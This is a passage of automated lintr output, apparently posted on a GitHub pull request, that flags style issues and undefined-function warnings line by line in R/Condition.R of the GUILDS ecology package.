operators.**\n```r\n​\tpoch_Y[cnt] = lgamma(I_Y[cnt] + Ny) - lgamma(I_Y[cnt]);\n                                           ~^~\n```\n[R/Condition.R:18:1:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L18) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:19:5:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L19) *style:* **Use <-, not =, for assignment.**\n```r\n​  c = a - b;\n    ^\n```\n[R/Condition.R:20:1:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L20) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:21:5:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L21) *style:* **Use <-, not =, for assignment.**\n```r\n​  h = poch_X + poch_Y - (lgamma(Nx+1) + lgamma(Ny+1));\n    ^\n```\n[R/Condition.R:21:35:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​  h = poch_X + poch_Y - (lgamma(Nx+1) + lgamma(Ny+1));\n                                 ~^~\n```\n[R/Condition.R:21:50:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​  h = poch_X + poch_Y - (lgamma(Nx+1) + lgamma(Ny+1));\n                                                ~^~\n```\n[R/Condition.R:22:1:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L22) *style:* **Trailing whitespace is superfluous.**\n```r\n​   \n^~~\n```\n[R/Condition.R:23:1:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L23) *style:* **lines should not be more than 80 characters.**\n```r\n​  k  =  lgamma((theta_x/2) + (theta_y/2)) - (lgamma(theta_x/2) + lgamma(theta_y/2));\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:23:6:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L23) *style:* **Use <-, not =, for assignment.**\n```r\n​  k  =  lgamma((theta_x/2) + (theta_y/2)) - (lgamma(theta_x/2) + lgamma(theta_y/2));\n     ^\n```\n[R/Condition.R:23:16:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L23) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  k  =  lgamma((theta_x/2) + (theta_y/2)) - (lgamma(theta_x/2) + lgamma(theta_y/2));\n               ^\n```\n[R/Condition.R:23:24:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​  k  =  lgamma((theta_x/2) + (theta_y/2)) - (lgamma(theta_x/2) + lgamma(theta_y/2));\n                      ~^~\n```\n[R/Condition.R:23:38:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​  k  =  lgamma((theta_x/2) + (theta_y/2)) - (lgamma(theta_x/2) + lgamma(theta_y/2));\n                                    ~^~\n```\n[R/Condition.R:23:60:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​  k  =  lgamma((theta_x/2) + (theta_y/2)) - (lgamma(theta_x/2) + lgamma(theta_y/2));\n                                                          ~^~\n```\n[R/Condition.R:23:80:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​  k  =  lgamma((theta_x/2) + (theta_y/2)) - (lgamma(theta_x/2) + lgamma(theta_y/2));\n                                                                              ~^~\n```\n[R/Condition.R:24:6:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L24) *style:* **Use <-, not =, for assignment.**\n```r\n​  l  = ((theta_x/2) - 1) * log(nx) + ((theta_y/2) - 1) * log(ny);\n     ^\n```\n[R/Condition.R:24:9:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L24) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  l  = ((theta_x/2) - 1) * log(nx) + ((theta_y/2) - 1) * log(ny);\n        ^\n```\n[R/Condition.R:24:17:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​  l  = ((theta_x/2) - 1) * log(nx) + ((theta_y/2) - 1) * log(ny);\n               ~^~\n```\n[R/Condition.R:24:39:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L24) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  l  = ((theta_x/2) - 1) * log(nx) + ((theta_y/2) - 1) * log(ny);\n                                      ^\n```\n[R/Condition.R:24:47:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​  l  = ((theta_x/2) - 1) * log(nx) + ((theta_y/2) - 1) * log(ny);\n                                             ~^~\n```\n[R/Condition.R:25:1:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L25) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:26:10:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L26) *style:* **Use <-, not =, for assignment.**\n```r\n​  result = c + h + k + l;\n         ^\n```\n[R/Condition.R:31:1:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L31) *style:* **Variable and function names should be all lowercase.**\n```r\n​calcConditional <- function(v,model,Nx,Ny) {\n^~~~~~~~~~~~~~~\n```\n[R/Condition.R:31:1:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L31) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tx <- subplex(initVals,g);\n^\n```\n[R/Condition.R:31:31:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L31) *style:* **Commas should always have a space after.**\n```r\n​calcConditional <- function(v,model,Nx,Ny) {\n                              ^\n```\n[R/Condition.R:31:37:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L31) *style:* **Commas should always have a space after.**\n```r\n​calcConditional <- function(v,model,Nx,Ny) {\n                                    ^\n```\n[R/Condition.R:31:40:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L31) *style:* **Commas should always have a space after.**\n```r\n​calcConditional <- function(v,model,Nx,Ny) {\n                                       ^\n```\n[R/Condition.R:32:3:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L32) *style:* **Variable and function names should be all lowercase.**\n```r\n​  incorrectLength <- 0;\n  ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:33:5:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(model == \"D0\" && length(v) != 2) incorrectLength <- 1;\n    ^\n```\n[R/Condition.R:33:39:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L33) *style:* **Variable and function names should be all lowercase.**\n```r\n​  if(model == \"D0\" && length(v) != 2) incorrectLength <- 1;\n                                      ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:34:5:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L34) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(model == \"D1\" && length(v) != 3) incorrectLength <- 1;\n    ^\n```\n[R/Condition.R:34:39:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L34) *style:* **Variable and function names should be all lowercase.**\n```r\n​  if(model == \"D1\" && length(v) != 3) incorrectLength <- 1;\n                                      ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:35:1:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L35) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:36:1:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L36) *style:* **lines should not be more than 80 characters.**\n```r\n​  if(incorrectLength == 1) { cat(\"Input vector is of incorrect length\\n\"); return; };\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:36:5:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L36) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(incorrectLength == 1) { cat(\"Input vector is of incorrect length\\n\"); return; };\n    ^\n```\n[R/Condition.R:36:6:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L36) *style:* **Variable and function names should be all lowercase.**\n```r\n​  if(incorrectLength == 1) { cat(\"Input vector is of incorrect length\\n\"); return; };\n     ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:36:28:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L36) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​  if(incorrectLength == 1) { cat(\"Input vector is of incorrect length\\n\"); return; };\n                           ^\n```\n[R/Condition.R:36:84:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L36) *style:* **Closing curly-braces should always be on their own line, unless it's followed by an else.**\n```r\n​  if(incorrectLength == 1) { cat(\"Input vector is of incorrect length\\n\"); return; };\n                                                                                   ^\n```\n[R/Condition.R:37:1:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L37) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:38:1:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L38) *style:* **lines should not be more than 80 characters.**\n```r\n​  if(model == \"D0\") { theta_x = v[1]; theta_y = v[1]; alpha_x = v[2]; alpha_y = v[2];}\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:38:5:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L38) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(model == \"D0\") { theta_x = v[1]; theta_y = v[1]; alpha_x = v[2]; alpha_y = v[2];}\n    ^\n```\n[R/Condition.R:38:21:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L38) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​  if(model == \"D0\") { theta_x = v[1]; theta_y = v[1]; alpha_x = v[2]; alpha_y = v[2];}\n                    ^\n```\n[R/Condition.R:38:31:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L38) *style:* **Use <-, not =, for assignment.**\n```r\n​  if(model == \"D0\") { theta_x = v[1]; theta_y = v[1]; alpha_x = v[2]; alpha_y = v[2];}\n                              ^\n```\n[R/Condition.R:38:47:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L38) *style:* **Use <-, not =, for assignment.**\n```r\n​  if(model == \"D0\") { theta_x = v[1]; theta_y = v[1]; alpha_x = v[2]; alpha_y = v[2];}\n                                              ^\n```\n[R/Condition.R:38:63:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L38) *style:* **Use <-, not =, for assignment.**\n```r\n​  if(model == \"D0\") { theta_x = v[1]; theta_y = v[1]; alpha_x = v[2]; alpha_y = v[2];}\n                                                              ^\n```\n[R/Condition.R:38:79:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L38) *style:* **Use <-, not =, for assignment.**\n```r\n​  if(model == \"D0\") { theta_x = v[1]; theta_y = v[1]; alpha_x = v[2]; alpha_y = v[2];}\n                                                                              ^\n```\n[R/Condition.R:38:86:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L38) *style:* **Closing curly-braces should always be on their own line, unless it's followed by an else.**\n```r\n​  if(model == \"D0\") { theta_x = v[1]; theta_y = v[1]; alpha_x = v[2]; alpha_y = v[2];}\n                                                                                     ^\n```\n[R/Condition.R:39:1:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L39) *style:* **lines should not be more than 80 characters.**\n```r\n​  if(model == \"D1\") { theta_x = v[1]; theta_y = v[1]; alpha_x = v[2]; alpha_y = v[3];}\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:39:5:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L39) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(model == \"D1\") { theta_x = v[1]; theta_y = v[1]; alpha_x = v[2]; alpha_y = v[3];}\n    ^\n```\n[R/Condition.R:39:21:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L39) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​  if(model == \"D1\") { theta_x = v[1]; theta_y = v[1]; alpha_x = v[2]; alpha_y = v[3];}\n                    ^\n```\n[R/Condition.R:39:31:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L39) *style:* **Use <-, not =, for assignment.**\n```r\n​  if(model == \"D1\") { theta_x = v[1]; theta_y = v[1]; alpha_x = v[2]; alpha_y = v[3];}\n                              ^\n```\n[R/Condition.R:39:47:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L39) *style:* **Use <-, not =, for assignment.**\n```r\n​  if(model == \"D1\") { theta_x = v[1]; theta_y = v[1]; alpha_x = v[2]; alpha_y = v[3];}\n                                              ^\n```\n[R/Condition.R:39:63:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L39) *style:* **Use <-, not =, for assignment.**\n```r\n​  if(model == \"D1\") { theta_x = v[1]; theta_y = v[1]; alpha_x = v[2]; alpha_y = v[3];}\n                                                              ^\n```\n[R/Condition.R:39:79:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L39) *style:* **Use <-, not =, for assignment.**\n```r\n​  if(model == \"D1\") { theta_x = v[1]; theta_y = v[1]; alpha_x = v[2]; alpha_y = v[3];}\n                                                                              ^\n```\n[R/Condition.R:39:86:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L39) *style:* **Closing curly-braces should always be on their own line, unless it's followed by an else.**\n```r\n​  if(model == \"D1\") { theta_x = v[1]; theta_y = v[1]; alpha_x = v[2]; alpha_y = v[3];}\n                                                                                     ^\n```\n[R/Condition.R:40:1:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L40) *style:* **Trailing whitespace is superfluous.**\n```r\n​ \n^\n```\n[R/Condition.R:41:5:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L41) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_x<0||alpha_y<0||theta_x<1||theta_y<1) return(-Inf)\n    ^\n```\n[R/Condition.R:41:13:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L41) *style:* **Put spaces around all infix operators.**\n```r\n​  if(alpha_x<0||alpha_y<0||theta_x<1||theta_y<1) return(-Inf)\n           ~^~\n```\n[R/Condition.R:41:15:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L41) *style:* **Put spaces around all infix operators.**\n```r\n​  if(alpha_x<0||alpha_y<0||theta_x<1||theta_y<1) return(-Inf)\n             ~^~~\n```\n[R/Condition.R:41:24:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L41) *style:* **Put spaces around all infix operators.**\n```r\n​  if(alpha_x<0||alpha_y<0||theta_x<1||theta_y<1) return(-Inf)\n                      ~^~\n```\n[R/Condition.R:41:26:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L41) *style:* **Put spaces around all infix operators.**\n```r\n​  if(alpha_x<0||alpha_y<0||theta_x<1||theta_y<1) return(-Inf)\n                        ~^~~\n```\n[R/Condition.R:41:35:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L41) *style:* **Put spaces around all infix operators.**\n```r\n​  if(alpha_x<0||alpha_y<0||theta_x<1||theta_y<1) return(-Inf)\n                                 ~^~\n```\n[R/Condition.R:41:37:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L41) *style:* **Put spaces around all infix operators.**\n```r\n​  if(alpha_x<0||alpha_y<0||theta_x<1||theta_y<1) return(-Inf)\n                                   ~^~~\n```\n[R/Condition.R:41:46:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L41) *style:* **Put spaces around all infix operators.**\n```r\n​  if(alpha_x<0||alpha_y<0||theta_x<1||theta_y<1) return(-Inf)\n                                            ~^~\n```\n[R/Condition.R:42:5:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L42) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_x>(1-(1e-8))||alpha_y>(1-(1e-8))) return(-Inf)\n    ^\n```\n[R/Condition.R:42:13:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​  if(alpha_x>(1-(1e-8))||alpha_y>(1-(1e-8))) return(-Inf)\n           ~^~\n```\n[R/Condition.R:42:14:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L42) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_x>(1-(1e-8))||alpha_y>(1-(1e-8))) return(-Inf)\n             ^\n```\n[R/Condition.R:42:16:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​  if(alpha_x>(1-(1e-8))||alpha_y>(1-(1e-8))) return(-Inf)\n              ~^~\n```\n[R/Condition.R:42:17:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L42) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_x>(1-(1e-8))||alpha_y>(1-(1e-8))) return(-Inf)\n                ^\n```\n[R/Condition.R:42:24:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​  if(alpha_x>(1-(1e-8))||alpha_y>(1-(1e-8))) return(-Inf)\n                      ~^~~\n```\n[R/Condition.R:42:33:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​  if(alpha_x>(1-(1e-8))||alpha_y>(1-(1e-8))) return(-Inf)\n                               ~^~\n```\n[R/Condition.R:42:34:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L42) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_x>(1-(1e-8))||alpha_y>(1-(1e-8))) return(-Inf)\n                                 ^\n```\n[R/Condition.R:42:36:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​  if(alpha_x>(1-(1e-8))||alpha_y>(1-(1e-8))) return(-Inf)\n                                  ~^~\n```\n[R/Condition.R:42:37:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L42) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_x>(1-(1e-8))||alpha_y>(1-(1e-8))) return(-Inf)\n                                    ^\n```\n[R/Condition.R:43:1:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L43) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:45:1:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L45) *style:* **Trailing whitespace is superfluous.**\n```r\n​ \n^\n```\n[R/Condition.R:47:18:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L47) *style:* **Variable and function names should be all lowercase.**\n```r\n​    return( -1 * evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) );\n                 ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:47:18:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L47) *warning:* **no visible global function definition for ‘evaluateCondLik’**\n```r\n​    return( -1 * evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) );\n                 ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:47:36:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L47) *style:* **Commas should always have a space after.**\n```r\n​    return( -1 * evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) );\n                                   ^\n```\n[R/Condition.R:47:44:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L47) *style:* **Commas should always have a space after.**\n```r\n​    return( -1 * evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) );\n                                           ^\n```\n[R/Condition.R:47:52:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L47) *style:* **Commas should always have a space after.**\n```r\n​    return( -1 * evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) );\n                                                   ^\n```\n[R/Condition.R:47:60:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L47) *style:* **Commas should always have a space after.**\n```r\n​    return( -1 * evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) );\n                                                           ^\n```\n[R/Condition.R:47:68:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L47) *style:* **Commas should always have a space after.**\n```r\n​    return( -1 * evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) );\n                                                                   ^\n```\n[R/Condition.R:47:71:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L47) *style:* **Commas should always have a space after.**\n```r\n​    return( -1 * evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) );\n                                                                      ^\n```\n[R/Condition.R:49:1:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L49) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:50:12:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L50) *warning:* **no visible global function definition for ‘fminbnd’**\n```r\n​  maxes <- fminbnd(f,0,1,maxiter=500,tol=1e-4);\n           ^~~~~~~\n```\n[R/Condition.R:50:22:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L50) *style:* **Commas should always have a space after.**\n```r\n​  maxes <- fminbnd(f,0,1,maxiter=500,tol=1e-4);\n                     ^\n```\n[R/Condition.R:50:24:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L50) *style:* **Commas should always have a space after.**\n```r\n​  maxes <- fminbnd(f,0,1,maxiter=500,tol=1e-4);\n                       ^\n```\n[R/Condition.R:50:26:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L50) *style:* **Commas should always have a space after.**\n```r\n​  maxes <- fminbnd(f,0,1,maxiter=500,tol=1e-4);\n                         ^\n```\n[R/Condition.R:50:33:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​  maxes <- fminbnd(f,0,1,maxiter=500,tol=1e-4);\n                               ~^~\n```\n[R/Condition.R:50:38:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L50) *style:* **Commas should always have a space after.**\n```r\n​  maxes <- fminbnd(f,0,1,maxiter=500,tol=1e-4);\n                                     ^\n```\n[R/Condition.R:50:41:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​  maxes <- fminbnd(f,0,1,maxiter=500,tol=1e-4);\n                                       ~^~\n```\n[R/Condition.R:52:7:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L52) *style:* **Use <-, not =, for assignment.**\n```r\n​ ymax = -1 * maxes$fmin;\n      ^\n```\n[R/Condition.R:53:7:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L53) *style:* **Use <-, not =, for assignment.**\n```r\n​ xmax = maxes$xmin;\n      ^\n```\n[R/Condition.R:54:7:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L54) *style:* **Use <-, not =, for assignment.**\n```r\n​ xlft = 0;\n      ^\n```\n[R/Condition.R:55:7:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L55) *style:* **Use <-, not =, for assignment.**\n```r\n​ xrgt = 1;\n      ^\n```\n[R/Condition.R:56:6:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L56) *style:* **Use <-, not =, for assignment.**\n```r\n​ eps = .Machine$double.eps; \n     ^\n```\n[R/Condition.R:56:28:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L56) *style:* **Trailing whitespace is superfluous.**\n```r\n​ eps = .Machine$double.eps; \n                           ^\n```\n[R/Condition.R:58:1:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L58) *style:* **lines should not be more than 80 characters.**\n```r\n​ checkLeftX  = evaluateCondLik(eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:58:2:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L58) *style:* **Variable and function names should be all lowercase.**\n```r\n​ checkLeftX  = 